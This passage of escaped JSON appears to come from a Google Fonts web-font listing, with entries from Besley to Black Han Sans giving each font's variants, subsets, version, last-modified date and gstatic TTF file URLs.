\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fWjGSdRoFPOl8-E.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fVHGSdRoFPOl8-E.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fTbGSdRoFPOl8-E.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fR_GSdRoFPOl8-E.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CoZdiENGg4-E04A.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6Ck5diENGg4-E04A.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6Cf5BiENGg4-E04A.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CRpBiENGg4-E04A.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CIZBiENGg4-E04A.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CCJBiENGg4-E04A.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Beth Ellen\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bethellen/v17/WwkbxPW2BE-3rb_JNT-qEIAiVNo5xNY.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bevan\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bevan/v20/4iCj6KZ0a9NXjF8aUir7tlSJ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bevan/v20/4iCt6KZ0a9NXjG8YWC7Zs0SJD4U.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BhuTuka Expanded One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bhutukaexpandedone/v2/SLXXc0jZ4WUJcClHTtv0t7IaDRsBsWRiJCyX8pg_RVH1.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Display\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdY86JF46SRP4yZQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdQ87JF46SRP4yZQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YddE7JF46SRP4yZQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdY87JF46SRP4yZQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0Ydb07JF46SRP4yZQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdVE8JF46SRP4yZQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdWg8JF46SRP4yZQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdQ88JF46SRP4yZQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdSY8JF46SRP4yZQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Inline Display\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nBEnR5yPc2Huux.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0lBE3R5yPc2Huux.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0mfE3R5yPc2Huux.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nBE3R5yPc2Huux.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nzE3R5yPc2Huux.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0kfFHR5yPc2Huux.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0kmFHR5yPc2Huux.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0lBFHR5yPc2Huux.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0loFHR5yPc2Huux.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Inline Text\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwga0yqGN7Y6Jsc8c.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgY0y6GN7Y6Jsc8c.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgbqy6GN7Y6Jsc8c.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwga0y6GN7Y6Jsc8c.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgaGy6GN7Y6Jsc8c.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgZqzKGN7Y6Jsc8c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgZTzKGN7Y6Jsc8c.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgY0zKGN7Y6Jsc8c.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgYdzKGN7Y6Jsc8c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Stencil Display\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_O0nPKHznJucP9w.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_u0jPKHznJucP9w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_ZUjPKHznJucP9w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_O0jPKHznJucP9w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_CUjPKHznJucP9w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_5U_PKHznJucP9w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_3E_PKHznJucP9w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_u0_PKHznJucP9w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_kk_PKHznJucP9w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Stencil Text\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR04XIGS_Py_AWbQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRU4TIGS_Py_AWbQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRjYTIGS_Py_AWbQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR04TIGS_Py_AWbQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR4YTIGS_Py_AWbQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRDYPIGS_Py_AWbQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRNIPIGS_Py_AWbQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRU4PIGS_Py_AWbQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGReoPIGS_Py_AWbQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Big Shoulders Text\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Y-r3TIPNl6P2pc.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Q-q3TIPNl6P2pc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3dGq3TIPNl6P2pc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Y-q3TIPNl6P2pc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3b2q3TIPNl6P2pc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3VGt3TIPNl6P2pc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Wit3TIPNl6P2pc.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Q-t3TIPNl6P2pc.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Sat3TIPNl6P2pc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bigelow Rules\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bigelowrules/v23/RrQWboly8iR_I3KWSzeRuN0zT4cCH8WAJVk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bigshot One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bigshotone/v25/u-470qukhRkkO6BD_7cM_gxuUQJBXv_-.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bilbo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bilbo/v20/o-0EIpgpwWwZ210hpIRz4wxE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bilbo Swash Caps\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bilboswashcaps/v22/zrf-0GXbz-H3Wb4XBsGrTgq2PVmdqAPopiRfKp8.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BioRhyme\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ESOjnGAq8Sk1PoH.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ETqjXGAq8Sk1PoH.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/biorhyme/v12/1cXwaULHBpDMsHYW_HxGpVWIgNit.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ET6inGAq8Sk1PoH.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ETmiXGAq8Sk1PoH.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BioRhyme Expanded\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9LjbffxxcblSHSdTXrb_z.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9Ljbffxw4bVSHSdTXrb_z.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dQIE1zZzytGswgU577CDY9LjbffySURXCPYsje.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9LjbffxwoalSHSdTXrb_z.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9Ljbffxw0aVSHSdTXrb_z.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Birthstone\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/birthstone/v10/8AtsGs2xO4yLRhy87sv_HLn5jRfZHzM.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Birthstone Bounce\",\n      \"variants\": [\n        \"regular\",\n        \"500\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/birthstonebounce/v9/ga6XaxZF43lIvTWrktHOTBJZGH7dEeVJGIMYDo_8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/birthstonebounce/v9/ga6SaxZF43lIvTWrktHOTBJZGH7dEd29MacQJZP1LmD9.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Biryani\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddYQyGTBSU-J-RxQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddeAxGTBSU-J-RxQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/biryani/v13/hv-WlzNxIFoO84YdTUwZPTh5T-s.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddZQ3GTBSU-J-RxQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddfA2GTBSU-J-RxQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84Yddew1GTBSU-J-RxQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84Yddcg0GTBSU-J-RxQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bitter\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v32\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbeCL_EXFh2reU.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbfCL_EXFh2reU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8ajfCL_EXFh2reU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbfCL_EXFh2reU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8cTfCL_EXFh2reU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8SjYCL_EXFh2reU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8RHYCL_EXFh2reU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbYCL_EXFh2reU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bitter/v32/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8V_YCL_EXFh2reU.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4P3OWHpzveWxBw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPzOWHpzveWxBw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cvvzOWHpzveWxBw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4PzOWHpzveWxBw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c0vzOWHpzveWxBw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cPvvOWHpzveWxBw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cB_vOWHpzveWxBw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPvOWHpzveWxBw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/bitter/v32/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cSfvOWHpzveWxBw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Black And White Picture\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blackandwhitepicture/v22/TwMe-JAERlQd3ooUHBUXGmrmioKjjnRSFO-NqI5HbcMi-yWY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Black Han Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blackhansans/v15/ea8Aad44WunzF9a-dL6toA8r8nqVIXSkH-Hc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": 